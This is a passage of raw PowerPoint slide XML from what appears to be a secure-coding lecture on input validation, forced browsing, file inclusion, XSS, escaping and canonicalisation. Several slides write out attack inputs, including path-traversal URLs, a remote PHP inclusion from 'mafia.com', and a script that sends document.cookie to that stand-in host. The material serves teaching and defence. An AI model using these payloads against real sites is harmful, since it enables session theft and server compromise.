                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://company.nl/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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../../../dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="16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urandom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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</a:t>
            </a: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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Forced Browsing  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>company.nl/XYZ123/index.html?uid=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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s001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n-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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s002, s003,…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                        </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Local or Remote PHP file injection          	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                    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://company.nl/XYZ123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.html?uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>option</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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../../admin/menu.php%00</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>                               http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://company.nl/XYZ123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.html?uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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...</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>option=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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http://mafia.com/attack.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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chemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HTML injection &amp; XSS   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> via HTML input in text field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/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0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Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49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  <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=”http://a.com/a.jpg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>width =”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>999999999</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>” height=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>999999999”&gt; </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                    &lt;html&gt;&lt;script&gt; …; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img.src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> =”http://mafia.com/” + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600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Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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 smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or via URL parameter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                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>company.nl/XYZ123/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>index.html?uid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1600" dirty="0" smtClean="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=s456&amp;option=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB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2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>noSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, LDAP, XML, SSI, OGNL, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> … injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="16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34908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more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Additional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> actions</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Log </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> incident</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>lert </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the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sys-admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>?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3837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Beware of confusion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terms </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validating</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>checking validity &amp; rejecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="006600"/>
                </a:solidFill>
              </a:rPr>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="006600"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>filtering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>out - invalid ones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sanitising</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>somehow ‘fixing’ illegal input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escaping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>replacing some characters or  words to sanitise input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encoding</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>replacing all characters, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. base64 encoding</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="18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can have slightly different but overlapping meanings,           but are sometimes used interchangeably.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" smtClean="0"/>
              <a:t> URL-encoding is actually a form of escaping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41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94466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Canonicalisation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16013"/>
            <a:ext cx="7761288" cy="51323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dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Canonicalisation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smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	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is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>the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transformation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> of data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>unique</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>canonical</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> form</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="nl-NL" dirty="0" smtClean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nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="18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nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>changing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to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lowercase</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="18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nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>removing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dots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from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the</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> username in email </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>address</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" sz="18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endParaRPr lang="nl-NL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nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>convert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to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canonical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forms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nl-NL" i="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>before</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> 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>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validation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nl-NL" i="1" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>before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using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it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>decision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8512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Canonicalisation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0729"/>
            <a:ext cx="7918648" cy="526767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sz="1800" dirty="0" err="1"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>here</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>may</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" i="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>many</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ways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to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write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the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same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thing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>, eg.                      </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>upper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>lowercase</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> letters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/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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s123456</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1600" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-N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S123456</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" err="1" smtClean="0"/>
              <a:t>ignored</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
